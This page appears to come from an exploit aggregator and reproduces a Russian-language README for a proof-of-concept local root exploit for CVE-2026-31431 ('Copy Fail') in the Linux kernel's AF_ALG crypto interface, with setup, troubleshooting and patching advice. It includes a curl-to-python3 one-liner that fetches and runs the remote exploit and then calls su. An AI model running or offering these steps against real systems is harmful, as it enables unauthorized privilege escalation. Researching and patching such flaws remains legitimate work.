Sploitus

Exploit for CVE-2026-31431

kitploit · 2026-08-27

Exploit Code

MARKDOWN164 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ADEMZERO-CVE-2026-31431
# CVE-2026-31431 — PoC «Copy Fail»

Образовательный Proof of Concept для **CVE-2026-31431** , также известной как **Copy Fail** , — уязвимости локального повышения привилегий в ядре Linux, затрагивающей криптографический интерфейс `AF_ALG` / `algif_aead`.

> [!WARNING] Этот репозиторий предоставлен строго в образовательных, защитных и авторизованных исследовательских целях.
> 
> **Не** запускайте этот код на системах, которые вам не принадлежат, или на системах, где у вас нет явного письменного разрешения на тестирование.
> 
> Несанкционированное использование может быть незаконным.

* * *

## Обзор

**CVE-2026-31431** — это уязвимость локального повышения привилегий в ядре Linux, затрагивающая криптографическую подсистему ядра.

Уязвимость связана с путём AEAD, доступным через интерфейс `AF_ALG`, и может позволить локальному непривилегированному пользователю вмешиваться в данные page cache, связанные с читаемыми файлами, что потенциально может привести к повышению привилегий в уязвимых системах.

Этот репозиторий содержит минимальный образовательный Proof of Concept, предназначенный для контролируемых лабораторных сред.

* * *

## Требования

Целевая система должна предоставлять требуемый алгоритм AEAD через `AF_ALG`.

Проверить это можно с помощью:

root@kitploit:~
    
    
    grep -i "authencesn\|authenc" /proc/crypto
    

PoC ожидает поддержку алгоритма, аналогичного:

root@kitploit:~
    
    
    authencesn(hmac(sha256),cbc(aes))
    

Если алгоритм недоступен, PoC может завершиться с ошибкой, например:

root@kitploit:~
    
    
    FileNotFoundError: [Errno 2] No such file or directory
    

Это означает, что требуемый криптоалгоритм ядра недоступен в системе.

* * *

## Использование

Клонируйте репозиторий:

root@kitploit:~
    
    
    git clone https://github.com/Karim33z/CVE-2026-31431.git
    cd CVE-2026-31431
    

Запустите PoC:

root@kitploit:~
    
    
    python3 poc.py
    

Или запустите напрямую:

root@kitploit:~
    
    
    curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su
    

* * *

## Примечания по совместимости

В некоторых системах Linux используется `/bin/su` вместо `/usr/bin/su`. Проверить правильный путь можно с помощью:

root@kitploit:~
    
    
    which su
    

При необходимости измените целевой путь внутри `poc.py`.

* * *

## Устранение неполадок

### Отсутствует алгоритм AEAD

Если при привязке к `authencesn(hmac(sha256),cbc(aes))` возникает ошибка `FileNotFoundError: [Errno 2] No such file or directory`, значит, требуемый алгоритм ядра недоступен.

Проверьте доступные криптоалгоритмы:

root@kitploit:~
    
    
    cat /proc/crypto
    

или более конкретно:

root@kitploit:~
    
    
    grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto
    

### Неверный путь к su

Если PoC ссылается на `/usr/bin/su`, а ваша система использует `/bin/su`, проверьте с помощью:

root@kitploit:~
    
    
    which su
    

Затем соответствующим образом обновите путь в `poc.py`.

* * *

## Меры защиты

Специалистам по защите следует обновить ядро Linux до исправленной версии, предоставленной вендором дистрибутива.

После обновления ядра перезагрузите систему, чтобы убедиться, что исправленное ядро активно.

Временные меры могут включать ограничение доступа к затронутой криптофункциональности ядра в зависимости от окружения и дистрибутива.

* * *

## Правовое уведомление

Этот проект предназначен только для:

  * Исследований в области безопасности
  * Защитной валидации
  * Образовательных целей
  * Авторизованного лабораторного тестирования



Автор не несёт ответственности за неправомерное использование, ущерб или незаконную деятельность, вызванную этим кодом.

Используйте только на системах, где у вас есть явное разрешение.

* * *

## Лицензия

Этот проект лицензирован на условиях лицензии MIT.